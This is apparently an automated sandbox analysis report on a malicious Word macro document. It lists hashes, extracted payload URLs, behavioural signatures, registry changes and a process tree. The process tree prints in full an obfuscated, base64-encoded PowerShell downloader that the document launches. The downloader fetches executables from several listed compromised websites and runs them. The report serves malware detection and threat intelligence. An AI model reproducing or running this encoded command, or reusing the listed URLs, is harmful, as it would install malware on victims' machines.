Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
25/08/2024, 18:23
Static task
static1
Behavioral task
behavioral1
Sample
c14ee063f603688a82973f739d07437b_JaffaCakes118.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
c14ee063f603688a82973f739d07437b_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
c14ee063f603688a82973f739d07437b_JaffaCakes118.doc
-
Size
161KB
-
MD5
c14ee063f603688a82973f739d07437b
-
SHA1
228491c3faa9d8cf9c138cced2121afbecefb67a
-
SHA256
18e942439d79f97e34245158394275fae160da61d8abc66b9f45496a11e5a22e
-
SHA512
77ce17669ed8b95268869ac12094c613cf4c537422375880346c66e7ab26473dd92c994366088782c82e257aefd3e1bcc26043333b2a746715acd0d966065bf6
-
SSDEEP
1536:VxYAcBPFEiUSQH/P7HgOdPTQlmncksPsrbfPchzb8JRD3bNqfNpu39IId5a6XP3p:PR1qf69xak3MgxCo/ZIb0X+RrMgo
Malware Config
Extracted
http://transfersuvan.com/wp-admin/1J/
http://da-industrial.com/js/aX/
http://daprofesional.com/data4/aE/
http://degepro.com/eTrac/px/
http://hoagietesting10.com/wp-content/a/
https://lifeadvicer.com/wp-content/FX/
https://bangkokcityjewel.com/cgi-bin/F3/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2896 2204 POwersheLL.exe 30 -
Blocklisted process makes network request 6 IoCs
flow pid Process 6 2896 POwersheLL.exe 7 2896 POwersheLL.exe 9 2896 POwersheLL.exe 10 2896 POwersheLL.exe 12 2896 POwersheLL.exe 13 2896 POwersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\TypeLib\{650F6EC4-A830-4129-B7D7-FBBDDD4AF83E}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\TypeLib\{650F6EC4-A830-4129-B7D7-FBBDDD4AF83E}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{650F6EC4-A830-4129-B7D7-FBBDDD4AF83E}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{650F6EC4-A830-4129-B7D7-FBBDDD4AF83E}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\TypeLib\{650F6EC4-A830-4129-B7D7-FBBDDD4AF83E}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2844 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2896 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2896 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2844 WINWORD.EXE 2844 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2844 wrote to memory of 2640 2844 WINWORD.EXE 34 PID 2844 wrote to memory of 2640 2844 WINWORD.EXE 34 PID 2844 wrote to memory of 2640 2844 WINWORD.EXE 34 PID 2844 wrote to memory of 2640 2844 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c14ee063f603688a82973f739d07437b_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABSAF8ANAA1AGwAMwB1AD0AKAAoACcASwByACcAKwAnADIAJwApACsAJwB5ACcAKwAoACcAbgAnACsAJwA3AGgAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHUAcwBlAHIAcABSAG8ARgBpAGwARQBcAEsAbwBYAGkAUgA1AHIAXABBAHMAMABKAHoATQBGAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAEUAYwBUAE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBgAFUAcgBpAFQAYAB5AFAAUgBvAGAAVABPAEMATwBsACIAIAA9ACAAKAAnAHQAbAAnACsAJwBzACcAKwAoACcAMQAyACwAIAAnACsAJwB0ACcAKQArACcAbABzACcAKwAoACcAMQAxACwAIAAnACsAJwB0ACcAKwAnAGwAJwApACsAJwBzACcAKQA7ACQATwAxAHEAZAAyAGcAOAAgAD0AIAAoACcARQB0ACcAKwAoACcAbAB4ACcAKwAnAG4AJwArACcAMQBhAGYAJwApACsAJwBmACcAKQA7ACQAQQBpADMAYQA3AGkAdQA9ACgAJwBLACcAKwAoACcAMgBvAGMAZAAnACsAJwB5ACcAKQArACcANgAnACkAOwAkAFoAeABnAGEAMgAyAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBRACcAKwAnAEIAdQBLAG8AeAAnACkAKwAoACcAaQByADUAcgBRAEIAdQAnACsAJwBBACcAKwAnAHMAJwApACsAKAAnADAAJwArACcAagB6ACcAKQArACgAJwBtAGYAJwArACcAUQBCACcAKQArACcAdQAnACkALgAiAFIAZQBwAGAAbABBAEMAZQAiACgAKAAnAFEAQgAnACsAJwB1ACcAKQAsAFsAcwBUAFIAaQBuAGcAXQBbAGMASABhAHIAXQA5ADIAKQApACsAJABPADEAcQBkADIAZwA4ACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABWAGEAZAA0AG0AZgBrAD0AKAAnAEMAJwArACgAJwBmACcAKwAnAGIAcwAnACkAKwAoACcAMgAnACsAJwBfAF8AJwApACkAOwAkAEQAeAByADMAcQByADQAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBFAGIAYwBsAGkAZQBuAHQAOwAkAFIAeQBiAGwAbwA1AF8APQAoACcAaAAnACsAKAAnAHQAdABwACcAKwAnADoALwAvACcAKQArACcAdAByACcAKwAoACcAYQBuACcAKwAnAHMAZgAnACkAKwAoACcAZQAnACsAJwByAHMAdQB2ACcAKwAnAGEAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAdwBwACcAKwAnAC0AYQAnACsAKAAnAGQAJwArACcAbQBpAG4ALwAnACkAKwAnADEASgAnACsAJwAvACoAJwArACgAJwBoAHQAdAAnACsAJwBwADoAJwApACsAKAAnAC8ALwBkACcAKwAnAGEALQBpAG4AJwArACcAZAAnACkAKwAoACcAdQBzACcAKwAnAHQAcgAnACkAKwAnAGkAJwArACgAJwBhAGwAJwArACcALgBjAG8AJwApACsAJwBtACcAKwAnAC8AJwArACcAagAnACsAJwBzAC8AJwArACcAYQAnACsAKAAnAFgALwAnACsAJwAqACcAKQArACcAaAAnACsAJwB0AHQAJwArACgAJwBwADoALwAvAGQAJwArACcAYQAnACsAJwBwAHIAJwApACsAKAAnAG8AZgBlAHMAJwArACcAaQAnACkAKwAnAG8AJwArACgAJwBuAGEAbAAnACsAJwAuACcAKQArACgAJwBjAG8AbQAvAGQAJwArACcAYQB0AGEANAAnACsAJwAvACcAKQArACcAYQBFACcAKwAoACcALwAqACcAKwAnAGgAJwApACsAJwB0ACcAKwAoACcAdABwADoALwAnACsAJwAvAGQAJwApACsAKAAnAGUAZwAnACsAJwBlAHAAJwApACsAKAAnAHIAJwArACcAbwAuAGMAbwAnACsAJwBtAC8AZQBUAHIAYQBjACcAKwAnAC8AcAAnACsAJwB4AC8AKgBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAaABvAGEAJwApACsAKAAnAGcAaQAnACsAJwBlACcAKQArACgAJwB0AGUAJwArACcAcwB0ACcAKQArACgAJwBpAG4AZwAxACcAKwAnADAALgAnACkAKwAoACcAYwAnACsAJwBvAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAJwBjACcAKwAnAG8AJwArACgAJwBuAHQAJwArACcAZQBuACcAKQArACcAdAAnACsAKAAnAC8AYQAvACcAKwAnACoAaAAnACkAKwAnAHQAdAAnACsAKAAnAHAAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AbABpAGYAZQBhAGQAdgAnACsAJwBpAGMAJwArACcAZQAnACkAKwAnAHIALgAnACsAKAAnAGMAbwBtAC8AdwAnACsAJwBwAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAZQBuACcAKwAnAHQAJwApACsAKAAnAC8ARgAnACsAJwBYACcAKQArACcALwAnACsAJwAqAGgAJwArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAKAAnAC8ALwBiACcAKwAnAGEAJwApACsAKAAnAG4AJwArACcAZwBrAG8AJwApACsAKAAnAGsAYwBpAHQAeQAnACsAJwBqAGUAdwAnACsAJwBlACcAKQArACcAbAAnACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBjACcAKQArACcAZwBpACcAKwAoACcALQBiACcAKwAnAGkAbgAvAEYAMwAvACcAKQApAC4AIgBzAHAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFIANgAzAGwAZgBvAHcAPQAoACgAJwBDAGIAJwArACcAcQByACcAKwAnAHEAZAAnACkAKwAnAHEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAQQBjADkAMgBiAGEAOQAgAGkAbgAgACQAUgB5AGIAbABvADUAXwApAHsAdAByAHkAewAkAEQAeAByADMAcQByADQALgAiAEQATwB3AE4AYABMAGAAbwBhAEQARgBgAGkATABFACIAKAAkAEEAYwA5ADIAYgBhADkALAAgACQAWgB4AGcAYQAyADIAagApADsAJABVAHgANwBhAGIAbQBlAD0AKAAnAFkAJwArACcAeAA4ACcAKwAoACcAMQBnAGMAJwArACcAdgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABaAHgAZwBhADIAMgBqACkALgAiAEwARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMgA4ADgANQA4ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAFoAeABnAGEAMgAyAGoAKQA7ACQAUwBvAGoANwB0AHYAcQA9ACgAJwBPACcAKwAnAHoAawAnACsAKAAnAHoANQB6ACcAKwAnAGEAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAMQBlAGQAXwB4AG0APQAoACcAWAAnACsAKAAnAG8AcwByACcAKwAnADcAbQAnACsAJwBjACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAMgB6AGcAMwBqAD0AKAAoACcATAB3AHIAeAA1ACcAKwAnAGcAJwApACsAJwBlACcAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD50b679082a6eb72026ae7fc777bf4f594
SHA1f02e437c1a4db020b5534a9d3faaabb834da084f
SHA256555ae3710e8217b9d9a18f263ae3e2b2bf8dad77cbdf57be8b731d133b5c9937
SHA51245c1514a84d2417593790c9010dd6f9e83c50315c957a19c03ccbfb03ac2c9fecf09e68f2868ec855ef699f44bdd4374b03682a33858d894654023673c789221